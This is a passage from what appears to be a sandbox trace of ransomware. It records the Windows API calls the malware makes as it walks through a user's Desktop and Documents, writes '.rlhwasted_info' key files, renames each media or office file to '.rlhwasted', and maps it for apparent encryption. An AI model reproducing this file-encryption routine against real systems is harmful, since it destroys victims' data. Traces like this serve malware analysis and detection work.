"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\zvbz-6n7dsefjny.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0188.054] WriteFile (in: hFile=0x124, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0188.056] SetEndOfFile (hFile=0x124) returned 1 [0188.056] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.056] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0188.056] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ZvbZ-6N7DseFJny.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\zvbz-6n7dsefjny.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ZvbZ-6N7DseFJny.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\zvbz-6n7dsefjny.pptx.rlhwasted")) returned 1 [0188.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\77RatKR0_u1G\\ZvbZ-6N7DseFJny.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\77ratkr0_u1g\\zvbz-6n7dsefjny.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0188.057] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0188.057] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x164fd [0188.057] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x164fd) returned 0xb00000 [0188.057] CloseHandle (hObject=0x110) returned 1 [0188.064] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0188.065] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0188.065] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.065] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0188.066] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0188.066] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.088] SetEndOfFile (hFile=0x124) returned 1 [0188.090] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0188.090] CloseHandle (hObject=0x124) returned 1 [0188.092] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0188.092] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb680 | out: hHeap=0x6b0000) returned 1 [0188.092] _aulldvrm () returned 0x0 [0188.092] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0188.093] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0188.093] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\LSeRVe0CjX8cV6.mkv") returned 65 [0188.094] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28c) returned 0x6ee458 [0188.094] lstrcpyW (in: lpString1=0x6ee4da, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.094] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0188.094] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0188.095] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0188.095] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\LSeRVe0CjX8cV6.mkv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\lserve0cjx8cv6.mkv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0188.096] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0188.097] SetEndOfFile (hFile=0x124) returned 1 [0188.097] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.097] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0188.097] lstrcpyW (in: lpString1=0x6ee4da, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\LSeRVe0CjX8cV6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\lserve0cjx8cv6.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\LSeRVe0CjX8cV6.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\lserve0cjx8cv6.mkv.rlhwasted")) returned 1 [0188.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\LSeRVe0CjX8cV6.mkv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\lserve0cjx8cv6.mkv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0188.098] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0188.098] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x11277 [0188.098] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11277) returned 0xb00000 [0188.098] CloseHandle (hObject=0x104) returned 1 [0188.103] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0188.104] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0188.104] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.104] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0188.105] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0188.105] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.146] SetEndOfFile (hFile=0x124) returned 1 [0188.149] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0188.149] CloseHandle (hObject=0x124) returned 1 [0188.152] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0188.152] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fbc20 | out: hHeap=0x6b0000) returned 1 [0188.152] _aulldvrm () returned 0x0 [0188.153] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0188.154] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0188.154] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\ZCjfYKK.mp3") returned 58 [0188.154] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27e) returned 0x6ee458 [0188.154] lstrcpyW (in: lpString1=0x6ee4cc, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.154] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0188.154] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0188.155] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0188.155] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\ZCjfYKK.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\zcjfykk.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0188.158] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0188.160] SetEndOfFile (hFile=0x124) returned 1 [0188.161] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.161] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0188.161] lstrcpyW (in: lpString1=0x6ee4cc, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\ZCjfYKK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\zcjfykk.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\ZCjfYKK.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\zcjfykk.mp3.rlhwasted")) returned 1 [0188.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NGag\\ZCjfYKK.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngag\\zcjfykk.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0188.163] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0188.163] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x14418 [0188.163] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14418) returned 0xb00000 [0188.163] CloseHandle (hObject=0x110) returned 1 [0188.168] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0188.169] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0188.169] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.169] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0188.170] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0188.170] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.181] SetEndOfFile (hFile=0x124) returned 1 [0188.183] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0188.184] CloseHandle (hObject=0x124) returned 1 [0188.191] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0188.191] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fbdd8 | out: hHeap=0x6b0000) returned 1 [0188.191] _aulldvrm () returned 0x0 [0188.191] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0188.192] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0188.280] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Pgk3xDc6iN.bmp") returned 56 [0188.280] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27a) returned 0x6ee458 [0188.281] lstrcpyW (in: lpString1=0x6ee4c8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.281] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0188.281] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0188.281] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0188.281] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Pgk3xDc6iN.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgk3xdc6in.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0188.282] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0188.283] SetEndOfFile (hFile=0x110) returned 1 [0188.283] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.283] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0188.283] lstrcpyW (in: lpString1=0x6ee4c8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.283] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Pgk3xDc6iN.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgk3xdc6in.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Pgk3xDc6iN.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgk3xdc6in.bmp.rlhwasted")) returned 1 [0188.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Pgk3xDc6iN.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pgk3xdc6in.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0188.284] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0188.284] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x3b2e [0188.284] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b2e) returned 0x6a0000 [0188.284] CloseHandle (hObject=0x128) returned 1 [0188.288] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0188.289] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0188.289] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.289] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0188.290] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0188.290] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.311] SetEndOfFile (hFile=0x110) returned 1 [0188.314] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0188.314] CloseHandle (hObject=0x110) returned 1 [0188.385] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0188.385] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0188.386] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0188.386] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rzz 4x9BLb.m4a") returned 56 [0188.386] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27a) returned 0x6ee458 [0188.386] lstrcpyW (in: lpString1=0x6ee4c8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.386] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0188.387] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0188.387] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0188.388] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rzz 4x9BLb.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rzz 4x9blb.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0188.474] WriteFile (in: hFile=0x104, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0188.475] SetEndOfFile (hFile=0x104) returned 1 [0188.475] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.475] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0188.475] lstrcpyW (in: lpString1=0x6ee4c8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rzz 4x9BLb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rzz 4x9blb.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rzz 4x9BLb.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rzz 4x9blb.m4a.rlhwasted")) returned 1 [0188.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rzz 4x9BLb.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rzz 4x9blb.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0188.476] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0188.480] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0188.481] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0188.481] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.481] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0188.482] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0188.482] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.493] SetEndOfFile (hFile=0x104) returned 1 [0188.495] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0188.495] CloseHandle (hObject=0x104) returned 1 [0188.500] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0188.500] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0188.501] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0188.501] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cjsJzmwhtqdvA1OOTJ.ppt") returned 66 [0188.501] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28e) returned 0x6ee458 [0188.501] lstrcpyW (in: lpString1=0x6ee4dc, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0188.501] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0188.501] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0188.502] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0188.502] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0188.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cjsJzmwhtqdvA1OOTJ.ppt.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjsjzmwhtqdva1ootj.ppt.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0188.503] WriteFile (in: hFile=0x104, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0188.504] SetEndOfFile (hFile=0x104) returned 1 [0188.504] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.504] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0188.504] lstrcpyW (in: lpString1=0x6ee4dc, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0188.768] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cjsJzmwhtqdvA1OOTJ.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjsjzmwhtqdva1ootj.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cjsJzmwhtqdvA1OOTJ.ppt.rlhwasted" 